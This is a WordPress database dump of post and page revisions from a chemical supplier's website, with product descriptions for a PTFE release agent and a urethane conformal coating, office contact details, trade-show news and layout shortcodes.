INSERT INTO `wp_posts` VALUES (176, 1, '2016-08-16 00:11:14', '2016-08-16 00:11:14', '[row]\r\n\r\n[col span="1/1"]\r\n\r\n[product_categories number="5" columns="1"]\r\n\r\n[/col]\r\n\r\n[/row]', 'Products', '', 'inherit', 'closed', 'closed', '', '116-revision-v1', '', '', '2016-08-16 00:11:14', '2016-08-16 00:11:14', '', 116, 'https://132.148.10.86/wordpress/116-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (177, 1, '2016-08-16 00:11:37', '2016-08-16 00:11:37', '[row]\r\n\r\n[col span="1/1"]\r\n\r\n[ux_product_categories number="10" parent="0" columns="6"]\r\n\r\n[/col]\r\n\r\n[/row]', 'Products', '', 'inherit', 'closed', 'closed', '', '116-revision-v1', '', '', '2016-08-16 00:11:37', '2016-08-16 00:11:37', '', 116, 'https://132.148.10.86/wordpress/116-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (178, 1, '2016-08-16 00:12:09', '2016-08-16 00:12:09', '[row]\r\n\r\n[col span="1/1"]\r\n\r\n[product_categories number="10" parent="0" columns="6"]\r\n\r\n[/col]\r\n\r\n[/row]', 'Products', '', 'inherit', 'closed', 'closed', '', '116-revision-v1', '', '', '2016-08-16 00:12:09', '2016-08-16 00:12:09', '', 116, 'https://132.148.10.86/wordpress/116-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (180, 1, '2016-08-16 00:17:12', '2016-08-16 00:17:12', '[product_categories number="10" parent="0" columns="4" title="Our categories"]', 'Products', '', 'inherit', 'closed', 'closed', '', '116-revision-v1', '', '', '2016-08-16 00:17:12', '2016-08-16 00:17:12', '', 116, 'https://132.148.10.86/wordpress/116-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (181, 1, '2016-08-16 00:18:48', '2016-08-16 00:18:48', '', 'ptfe_122AV', '', 'inherit', 'open', 'closed', '', 'ptfe_lubricants', '', '', '2016-08-17 18:20:08', '2016-08-17 18:20:08', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/ptfe_lubricants.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (182, 1, '2016-08-16 00:22:55', '2016-08-16 00:22:55', '<h2>MS-122AV | PTFE release agent</h2>\r\n<h3>Superior Surface Adhesion; Extended Reapplication Intervals; High Durability</h3>\r\nMS-122AV combines high-efficiency low-molecular weight polytetrafluoroethylene (PTFE) and proprietary surface activation chemistry.  This PTFE release agent yields superior adhesion of PTFE to metallic, glass, and non-plastic surfaces. The result is unmatched durability, extended reapplication intervals and virtually no transfer. MS-122AV is ideal for composite molding and for a users most difficult molding operations  MS-122AV advantages include:\r\n<ul>\r\n 	<li>Unparalleled release agent durability</li>\r\n 	<li>Ideal for difficult mold geometries</li>\r\n 	<li>Improves quality and consistency of molded parts</li>\r\n 	<li>Nonflammable; Non-ozone depleting formulation</li>\r\n 	<li>Non-migrating; Non-staining</li>\r\n</ul>\r\nMiller-Stephenson has been developing PTFE release agents for over 40 years. We is a global leader in the development of value-adding specialty release agents. We offer an expansive portfolio of release agents tailor-made for many different<strong><a href="https://www.miller-stephenson.com/composite-mold-release-agents/"> industrial applications</a></strong>.  This class of release agent yields a uniform, dry film on the mold surface while also offering superior surface adhesion and durability.  PTFE mold release agents typically can last numerous molding cycles before re-application is necessary, and is ideal for compression and transfer molding operations.  One drawback is its relatively poor performance in injection molding, which requires surface slip that PTFE dry films cannot achieve. PTFE release agents are particular effective in potting and casting molding operations, specifically with electronic potting and casting as PTFE\'s chemical inertness and low-transfer will not interfere with the sensitive electronics.\r\n<h3>Why Choose MS-122AV | PTFE release agent?</h3>\r\nProduction engineers will typically choose PTFE release agent if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates. PTFE, on a release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson’s MS-122AV is a formulation which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry.\r\n\r\nMiller-Stephenson offers a selection of specialized formulations which provide high performance solutions for your molding process.  All variants of the MS-122 Series will deliver higher productivity, lower rejection rates, and higher quality products.  Please use the product selection guide below to help direct you to the appropriate product.\r\n\r\n<a href="https://www.miller-stephenson.com/mold-release-agents/">If you would like more information on which mold release agent is right for you click here</a>', 'MS-122AV | PTFE release agent', 'MS-122AV combines high-efficiency low-molecular weight polytetrafluoroethylene (PTFE) and proprietary surface activation chemistry.  This formulation yields superior adhesion of PTFE to metallic, glass, and non-plastic surfaces. The result is unmatched durability, extended reapplication intervals and virtually no transfer.   MS-122AV advantages include:\r\n<ul>\r\n 	<li>Unparalleled release agent durability</li>\r\n 	<li>Ideal for difficult mold geometries</li>\r\n 	<li>Improves quality and consistency of molded parts</li>\r\n 	<li>Nonflammable; Non-ozone depleting formulation</li>\r\n 	<li>Non-migrating; Non-staining</li>\r\n</ul>', 'publish', 'closed', 'closed', '', 'ptfe-release-agent', '', '', '2017-06-05 12:43:21', '2017-06-05 12:43:21', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=182', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (183, 1, '2016-08-16 00:21:30', '2016-08-16 00:21:30', '', 'release66', '', 'inherit', 'open', 'closed', '', 'release66', '', '', '2016-08-16 00:21:30', '2016-08-16 00:21:30', '', 182, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/release66.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (184, 1, '2016-08-16 00:28:37', '2016-08-16 00:28:37', '[product_categories number="10" parent="0" columns="3" title="Our categories"]', 'Products', '', 'inherit', 'closed', 'closed', '', '116-revision-v1', '', '', '2016-08-16 00:28:37', '2016-08-16 00:28:37', '', 116, 'https://132.148.10.86/wordpress/116-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (185, 1, '2016-08-16 00:30:07', '2016-08-16 00:30:07', '[product_categories number="10" parent="0" columns="3" title="Our categories"]\r\n<br>\r\n[ux_banner bg="https://imageurl" height="300px" text_color="light" text_align="center" text_pos="center" text_width="70%" parallax_text="0" parallax="0" effect=""]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>RELEASYS&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new fluorinated water-based release agent</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]', 'Products', '', 'inherit', 'closed', 'closed', '', '116-revision-v1', '', '', '2016-08-16 00:30:07', '2016-08-16 00:30:07', '', 116, 'https://132.148.10.86/wordpress/116-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (186, 1, '2016-08-16 00:31:08', '2016-08-16 00:31:08', '<row>\r\n[product_categories number="10" parent="0" columns="3" title="Our categories"]\r\n\r\n<br>\r\n</row>\r\n<row>\r\n[ux_banner bg="https://imageurl" height="300px" text_color="light" text_align="center" text_pos="center" text_width="70%" parallax_text="0" parallax="0" effect=""]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>RELEASYS&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new fluorinated water-based release agent</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]\r\n</row>', 'Products', '', 'inherit', 'closed', 'closed', '', '116-revision-v1', '', '', '2016-08-16 00:31:08', '2016-08-16 00:31:08', '', 116, 'https://132.148.10.86/wordpress/116-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (190, 1, '2016-08-16 01:07:43', '2016-08-16 01:07:43', 'Miller-Stephenson’s MIL-Spec Urethane Conformal Coating ( MS-470S ) offers superior toughness and abrasion resistance and excellent protection from humidity and organic solvents. Urethane resins are very hard and resistant to mechanical wear.  The base resin conforms to MIL-I-46058C Type UR, IPC-CC-830B and is UL 94 V-0 listed. The coating is recognized under UL file number E105698. MS-470S has the following benefits:\r\n<ul>\r\n 	<li>Superior toughness and abrasion resistance</li>\r\n 	<li>Reworkable and room temperature cure</li>\r\n 	<li>Solvent and discoloration resistant</li>\r\n 	<li>Fluorescent under UV light</li>\r\n 	<li>MIL-I-46058C Type UR, IPC-CC-830B, UL 94 V-0</li>\r\n</ul>\r\nPolyurethane coatings are available as either aerosol or bulk formulations. Both formulations provide excellent humidity resistance and far greater chemical resistance than Acrylic coatings. Single component Polyurethanes, while easy to apply, enjoy long pot life but sometimes require very lengthy cure cycles to achieve full or optimum cure. The cure cycle can be accelerated by the application of heat typically reducing cure times to less than 4-5 hours at 50% humidity.\r\n\r\nCleanliness of the substrate is of extreme importance for the successful application of a conformal coating. Surfaces must be free of moisture, dirt, wax, grease, flux residues and all other contaminants. Contamination under the coating could cause problems that may lead to assembly failures. MS-470s will cover 8.6 square feet at a 2-mil thickness per 14-oz. aerosol can. Printed circuit boards or electronics covered with urethane coating are repairable, simply heat the coating with a soldering iron to remove the components.\r\n\r\n<span style="font-size: 11.0pt; font-family: \'Helvetica\',sans-serif; color: #555555;">MIL-Spec Urethane Conformal Coating provide a barrier to air-borne contaminants from the operating environment, such as salt-spray, thus preventing corrosion.  Some typical application examples include high-reliability defense, automotive and aerospace, where coatings are used to protect against various combinations of moisture, aggressive chemicals and vapors, salt sprays, large temperature variations, mechanical vibration, and even organic attack (e.g. fungus). The protective nature of conformal coatings also means that they not only protect, but also serve to enhance product reliability and thereby reduce the potential cost and damaging effects of early field failures.</span>\r\n\r\n<a href="https://www.miller-stephenson.com/conformal-coating/">For help in choosing the correct conformal coating for your application see our article section</a>\r\n\r\nMore than a world-class materials supplier, Miller-Stephenson is an expert and dedicated collaborator. If our product finder cannot identify an off-the-shelf solution that meets your precise specifications or if you are looking for application expertise and support please <a href="https://www.miller-stephenson.com/tech-support/">contact us</a>.', 'MS-470S', 'Miller-Stephenson’s Urethane Conformal Coating offers superior toughness and abrasion resistance and excellent protection from humidity and organic solvents. Urethane resins are very hard and resistant to mechanical wear.  The base resin conforms to MIL-I-46058C Type UR, IPC-CC-830B and is UL 94 V-0 listed. The coating is recognized under UL file number E105698. MS-470S has the following benefits:\r\n<ul>\r\n 	<li>Superior toughness and abrasion resistance</li>\r\n 	<li>Reworkable and room temperature cure</li>\r\n 	<li>Solvent and discoloration resistant</li>\r\n 	<li>Fluorescent under UV light</li>\r\n 	<li>MIL-I-46058C Type UR, IPC-CC-830B, UL 94 V-0</li>\r\n</ul>', 'publish', 'open', 'closed', '', 'mil-spec-urethane-conformal-coating', '', '', '2016-11-24 03:26:44', '2016-11-24 03:26:44', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=190', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (191, 1, '2016-08-16 01:43:50', '2016-08-16 01:43:50', '', 'conformal', '', 'inherit', 'open', 'closed', '', 'conformal-3', '', '', '2016-08-16 01:43:50', '2016-08-16 01:43:50', '', 190, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/conformal-2.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (192, 1, '2016-08-16 10:16:43', '2016-08-16 10:16:43', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="240px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n___\r\n<h1 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h1>\r\n<h3 class="animated fadeInRight">___</h3>\r\n\r\n[button text="MORE" link="https://" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="150px" bg="86" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="https://"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; OTHER LUBRICANTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY SOLVENTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="CONFORMAL COATINGS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="139" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO PRODUCTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n&nbsp;\r\n\r\n[row]\r\n\r\n[col span="5/6"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n&nbsp;<br>\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner bg="https://imageurl" height="300px" text_color="light" text_align="center" text_pos="center" text_width="70%" parallax_text="0" parallax="0" effect=""]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>RELEASYS&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new fluorinated water-based release agent</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-16 10:16:43', '2016-08-16 10:16:43', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (193, 1, '2016-08-16 10:22:00', '2016-08-16 10:22:00', '[row]\r\n\r\n[col span="1/2"]\r\n\r\n[ninja_forms_display_form id="1"]\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n\r\n<h3>Global Offices</h3>Corporate Office\r\n55 Backus Ave. Danbury, CT 06810-7328\r\n203.743.4447 / 800.442.3424 Fax 203.791.8702 e-mail: ctsales@mschem.com\r\n\r\nIllinois\r\n6348 Oakton St. Morton Grove, IL 60053\r\n847.966.2022 / 800.447.4866 Fax 847.966.8468 e-mail: ilsales@mschem.com\r\n\r\nFor Medical &amp; Transportation Emergencies, Call 800.424.9300\r\n\r\nCalifornia\r\n12261 Foothill Blvd. Sylmar, CA 91342\r\n818.896.4714 / 800.771.8161 Fax 818.896.6086 e-mail: casales@mschem.com\r\n\r\nCanada\r\n280 Belfield Road Toronto, Ontario M9W 1H6\r\n800.307.2199 Fax 416.674.2987 e-mail: canadasales@\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[map lat="48.89364" long="2.33739" height="500px" color="#58728a" zoom="17"]\r\n\r\nEnter Map content here\r\n\r\n[/map]\r\n\r\n[/col]\r\n\r\n[/row]', 'Contact', '', 'inherit', 'closed', 'closed', '', '120-revision-v1', '', '', '2016-08-16 10:22:00', '2016-08-16 10:22:00', '', 120, 'https://132.148.10.86/wordpress/120-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (194, 1, '2016-08-16 10:23:07', '2016-08-16 10:23:07', '[row]\r\n\r\n[col span="1/2"]\r\n\r\n[ninja_forms_display_form id="1"]\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n\r\n<h3>Global Offices</h3>Corporate Office\r\n55 Backus Ave. Danbury, CT 06810-7328\r\n203.743.4447 / 800.442.3424 Fax 203.791.8702 e-mail: ctsales@mschem.com\r\n\r\nIllinois\r\n6348 Oakton St. Morton Grove, IL 60053\r\n847.966.2022 / 800.447.4866 Fax 847.966.8468 e-mail: ilsales@mschem.com\r\n\r\nFor Medical &amp; Transportation Emergencies, Call 800.424.9300\r\n\r\nCalifornia\r\n12261 Foothill Blvd. Sylmar, CA 91342\r\n818.896.4714 / 800.771.8161 Fax 818.896.6086 e-mail: casales@mschem.com\r\n\r\nCanada\r\n280 Belfield Road Toronto, Ontario M9W 1H6\r\n800.307.2199 Fax 416.674.2987 e-mail: canadasales@\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[map lat="41.373306" long="-73.492442" height="500px" color="#58728a" zoom="17"]\r\n\r\nEnter Map content here\r\n\r\n[/map]\r\n\r\n[/col]\r\n\r\n[/row]', 'Contact', '', 'inherit', 'closed', 'closed', '', '120-revision-v1', '', '', '2016-08-16 10:23:07', '2016-08-16 10:23:07', '', 120, 'https://132.148.10.86/wordpress/120-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (195, 1, '2016-08-16 10:23:59', '2016-08-16 10:23:59', '[row]\r\n\r\n[col span="1/2"]\r\n\r\n[ninja_forms_display_form id="1"]\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n\r\n<h3>Global Offices</h3>Corporate Office\r\n55 Backus Ave. Danbury, CT 06810-7328\r\n203.743.4447 / 800.442.3424 Fax 203.791.8702 e-mail: ctsales@mschem.com\r\n\r\nIllinois\r\n6348 Oakton St. Morton Grove, IL 60053\r\n847.966.2022 / 800.447.4866 Fax 847.966.8468 e-mail: ilsales@mschem.com\r\n\r\nFor Medical &amp; Transportation Emergencies, Call 800.424.9300\r\n\r\nCalifornia\r\n12261 Foothill Blvd. Sylmar, CA 91342\r\n818.896.4714 / 800.771.8161 Fax 818.896.6086 e-mail: casales@mschem.com\r\n\r\nCanada\r\n280 Belfield Road Toronto, Ontario M9W 1H6\r\n800.307.2199 Fax 416.674.2987 e-mail: canadasales@\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[map lat="41.373306" long="-73.492442" height="500px" color="#58728a" zoom="17"]\r\n\r\nMiller-Stephenson, Inc.\r\n55 Backus ave.\r\nDanbury, CT 06810-7328\r\n\r\n[/map]\r\n\r\n[/col]\r\n\r\n[/row]', 'Contact', '', 'inherit', 'closed', 'closed', '', '120-revision-v1', '', '', '2016-08-16 10:23:59', '2016-08-16 10:23:59', '', 120, 'https://132.148.10.86/wordpress/120-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (197, 1, '2016-08-16 10:26:18', '2016-08-16 10:26:18', '[row]\r\n\r\n[col span="1/4"]\r\n\r\n<h3>Upcoming Trade Shows</h3>\r\n\r\n[/col]\r\n\r\n[col span="2/4"]\r\n\r\nELECTRIC &amp; HYBRID VEHICLE TECHNOLOGY EXPO 2016\r\n\r\nMiller-Stephenson would like to invite you to visit us at the Electric &amp; Hybrid Vehicle Technology Expo in Novi, Michigan on September 13-15 – Booth #736. View all of our latest formulations! For a free pass call us at (800) 992 2424.\r\n\r\nCAMX SHOW 2016\r\n\r\nMiller-Stephenson would like to invite you to visit us at the CAMX Show in Anaheim, California on September 27-29 Booth # C36. View all of our latest formulations! For a free pass, call us at (800) 992-2424.\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="163"]\r\n\r\n[/col]\r\n\r\n[/row]', 'News', '', 'inherit', 'closed', 'closed', '', '118-revision-v1', '', '', '2016-08-16 10:26:18', '2016-08-16 10:26:18', '', 118, 'https://132.148.10.86/wordpress/118-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (198, 1, '2016-08-16 10:26:47', '2016-08-16 10:26:47', '[row]\r\n\r\n[col span="1/4"]\r\n\r\n<h3>Upcoming Trade Shows</h3>\r\n\r\n[/col]\r\n\r\n[col span="2/4"]\r\n\r\nELECTRIC &amp; HYBRID VEHICLE TECHNOLOGY EXPO 2016\r\n\r\nMiller-Stephenson would like to invite you to visit us at the Electric &amp; Hybrid Vehicle Technology Expo in Novi, Michigan on September 13-15 – Booth #736. View all of our latest formulations! For a free pass call us at (800) 992 2424.\r\n\r\nCAMX SHOW 2016\r\n\r\nMiller-Stephenson would like to invite you to visit us at the CAMX Show in Anaheim, California on September 27-29 Booth # C36. View all of our latest formulations! For a free pass, call us at (800) 992-2424.\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="50"]\r\n\r\n[/col]\r\n\r\n[/row]', 'News', '', 'inherit', 'closed', 'closed', '', '118-revision-v1', '', '', '2016-08-16 10:26:47', '2016-08-16 10:26:47', '', 118, 'https://132.148.10.86/wordpress/118-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (199, 1, '2016-08-16 10:27:40', '2016-08-16 10:27:40', '[row]\r\n\r\n[col span="1/4"]\r\n\r\n<h3>Upcoming Trade Shows</h3>\r\n\r\n[/col]\r\n\r\n[col span="2/4"]\r\n\r\nELECTRIC &amp; HYBRID VEHICLE TECHNOLOGY EXPO 2016\r\n\r\nMiller-Stephenson would like to invite you to visit us at the Electric &amp; Hybrid Vehicle Technology Expo in Novi, Michigan on September 13-15 – Booth #736. View all of our latest formulations! For a free pass call us at (800) 992 2424.\r\n\r\nCAMX SHOW 2016\r\n\r\nMiller-Stephenson would like to invite you to visit us at the CAMX Show in Anaheim, California on September 27-29 Booth # C36. View all of our latest formulations! For a free pass, call us at (800) 992-2424.\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="50"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n<h3>Congratulations Chemours™</h3>\r\n\r\n[/col]\r\n\r\n[col span="2/4"]\r\n\r\nAs you may have already heard, Dupont\'s Performance Chemicals business, which includes the Titanium Technologies and Chemicals &amp; Fluoroproducts business began operating as a separate company known as The Chemours Company ("Chemours™"), a wholly owned subsidiary of DuPont, as of January 1, 2015.\r\n\r\nMiller-Stephenson would like to take this opportunity to congratulate Chemours™ on becoming an officially new, stand-alone Company with a 200-year-old legacy, a portfolio of market-shaping products and a renewed commitment to their customers.\r\n\r\nChemours™ changeover to a stand-alone Company will not affect the manufacturing of their products, lead times or order conditions. Krytox, Vertrel® and DryFilm® are some of the Product lines that will transition from DuPont to Chemours™.\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="50"]\r\n\r\n[/col]\r\n\r\n[/row]', 'News', '', 'inherit', 'closed', 'closed', '', '118-revision-v1', '', '', '2016-08-16 10:27:40', '2016-08-16 10:27:40', '', 118, 'https://132.148.10.86/wordpress/118-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (200, 1, '2016-08-16 10:28:08', '2016-08-16 10:28:08', '', 'chemours', '', 'inherit', 'open', 'closed', '', 'chemours', '', '', '2016-08-16 10:28:08', '2016-08-16 10:28:08', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/chemours-1.png', 0, 'attachment', 'image/png', 0); 
INSERT INTO `wp_posts` VALUES (201, 1, '2016-08-16 10:28:25', '2016-08-16 10:28:25', '', 'chemours', '', 'inherit', 'open', 'closed', '', 'chemours-2', '', '', '2016-08-16 10:28:25', '2016-08-16 10:28:25', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/chemours-4.png', 0, 'attachment', 'image/png', 0); 
INSERT INTO `wp_posts` VALUES (202, 1, '2016-08-16 10:29:30', '2016-08-16 10:29:30', '[row]\r\n\r\n[col span="1/4"]\r\n\r\n<h3>Upcoming Trade Shows</h3>\r\n\r\n[/col]\r\n\r\n[col span="2/4"]\r\n\r\nELECTRIC &amp; HYBRID VEHICLE TECHNOLOGY EXPO 2016\r\n\r\nMiller-Stephenson would like to invite you to visit us at the Electric &amp; Hybrid Vehicle Technology Expo in Novi, Michigan on September 13-15 – Booth #736. View all of our latest formulations! For a free pass call us at (800) 992 2424.\r\n\r\nCAMX SHOW 2016\r\n\r\nMiller-Stephenson would like to invite you to visit us at the CAMX Show in Anaheim, California on September 27-29 Booth # C36. View all of our latest formulations! For a free pass, call us at (800) 992-2424.\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="50"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n<h3>Congratulations Chemours™</h3>\r\n\r\n[/col]\r\n\r\n[col span="2/4"]\r\n\r\nAs you may have already heard, Dupont\'s Performance Chemicals business, which includes the Titanium Technologies and Chemicals &amp; Fluoroproducts business began operating as a separate company known as The Chemours Company ("Chemours™"), a wholly owned subsidiary of DuPont, as of January 1, 2015.\r\n\r\nMiller-Stephenson would like to take this opportunity to congratulate Chemours™ on becoming an officially new, stand-alone Company with a 200-year-old legacy, a portfolio of market-shaping products and a renewed commitment to their customers.\r\n\r\nChemours™ changeover to a stand-alone Company will not affect the manufacturing of their products, lead times or order conditions. Krytox, Vertrel® and DryFilm® are some of the Product lines that will transition from DuPont to Chemours™.\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="200"]\r\n\r\n[/col]\r\n\r\n[/row]', 'News', '', 'inherit', 'closed', 'closed', '', '118-revision-v1', '', '', '2016-08-16 10:29:30', '2016-08-16 10:29:30', '', 118, 'https://132.148.10.86/wordpress/118-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (204, 1, '2016-08-16 10:31:33', '2016-08-16 10:31:33', '[row]\r\n\r\n[col]\r\n\r\n[ux_video url="https://www.youtube.com/watch?v=tbzqYPsuauI"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n<strong>On The Cutting Edge of the Performance Chemical Market</strong>\r\nMiller-Stephenson Chemical Company specializes in providing the most robust, efficient, and highest performing chemical solutions to all industrial sectors. Our innovative Research and Development team is in constant pursuit of the most technologically advanced materials to better serve our diverse customer base. Our new product pipeline is highly agile, constantly adjusting to develop solutions to the most stringent performance requirements. We strive to understand your unique business and engineering requirements and our dedicated technical team helps you find a solution. If our current portfolio can not solve your issue we hold the technical, material acquisition, and formulation capacity to develop a specialized solution to meet your needs.\r\n\r\n<strong>Miller-Stephenson Chemical Company, founded in 1955</strong>\r\nLooking back at over 60 years of success, Miller-Stephenson provides superior chemical solutions for a wide range of industries. We are committed to providing customers with industry-leading customer service, delivery and technical support to ensure our customers are successful. We strategically maintain four facilities throughout the United States and Canada to ensure prompt customer service and efficient delivery. Distribution outside North America is handled through authorized distributors. If you have any questions, feel free to contact our Customer Service Department.\r\n.\r\n\r\n[row]\r\n\r\n[col span="4"]\r\n\r\n[ux_image id="1054"]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_image id="142"]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_image id="87"]\r\n\r\n[/col]\r\n\r\n[/row]', 'About', '', 'publish', 'closed', 'closed', '', 'about-miller-stephenson', '', '', '2017-06-01 19:25:03', '2017-06-01 19:25:03', '', 0, 'https://132.148.10.86/wordpress/?page_id=204', 0, 'page', '', 0); 
INSERT INTO `wp_posts` VALUES (205, 1, '2016-08-16 10:31:33', '2016-08-16 10:31:33', ' ', '', '', 'publish', 'closed', 'closed', '', '205', '', '', '2016-08-16 10:31:33', '2016-08-16 10:31:33', '', 0, 'https://132.148.10.86/wordpress/205/', 0, 'nav_menu_item', '', 0); 
